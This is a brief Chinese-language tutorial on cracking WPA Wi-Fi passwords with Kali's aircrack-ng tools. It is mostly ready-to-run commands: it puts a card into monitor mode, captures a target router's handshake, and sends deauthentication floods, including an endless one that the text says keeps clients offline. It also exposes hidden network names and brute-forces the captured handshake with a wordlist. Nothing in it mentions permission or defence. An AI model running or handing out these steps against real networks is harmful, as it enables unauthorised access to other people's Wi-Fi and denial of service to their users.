配置无线网卡和信道
激活无线网卡至monitor即监听模式,并监听无线流量
airmon-ng start wlan0&&airodump-ng wlan0mon
查看需要破解的网在哪个频道(CH),数据传输量(Beacons)如何。
如果kali报错,网卡处于busy状态,则杀死所有占用进程airmon-ng check kill
使用iwconfig切换信道,和目标路由器信道一致
iwconfig wlan0 channel 1
或者 airodump-ng wlan1mon -c 1
无线网卡恢复到managed状态,也就是平常上网使用的状态
iwconfig wlan0mon mode managed 改变网卡的工作模式
抓包
开始抓包 ,用airodump-ng,-w是essid即wifi的名字,-c是信道号,--bssid是路由器mac地址,wlan0mon是无线网卡的名字,在配置无线网卡的时候,airmon-ng就修改了网卡的名字,如果不清楚可以ifconfig看。
airodump-ng -w tp_26 -c 1 --bssid 64:6E:97:C2:C6:A2 wlan0mon
为了加速握手包的获取,我们可以使用aireplay来给AP发送deauth包,假设无线客户端的mac为ff:ff:ff:ff:ff:ff,-a参数带路由器的mac,加上-0 参数,表示发送多少次断网包,-0 0设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网。
aireplay-ng -a 64:6E:97:C2:C6:A2 -0 0 wlan0mon
上面的命令会断开所有客户端和路由器的连接,使用-c参数来精确断开一个客户端和路由器的连接:
aireplay-ng -0 0 -a B4:0F:3B:C4:ED:F1 -c 02:85:B0:12:7C:DF wlan0mon
对于隐藏了essid的wifi,一种方法是暴力猜解,这种方法很费时,另一种是发送deauth包断开连接,但是需要有客户端与路由器有连接。介绍第二种方法
1、先开启专门的监听
airodump-ng -c 11 --bssid DC:21:E2:A4:F3:44 wlan0mon
2、断网攻击
aireplay-ng -a 66:6e:97:a1:d6:a1 -0 10 wlan0mon
不一会儿就会监听界面就会显示essid
5G频段的监听
airodump-ng -C 5000-6000 wlan0
找到响应的热点的信道,如ch 在153
airodump-ng -c 153 wlan0
暴力破解密码
windows下使用Elcomsoft Wireless Security Auditor(EWSA)软件进行暴力破解
kali下就用aircrack-ng。
aircrack-ng 01.cap -w ./字典.txt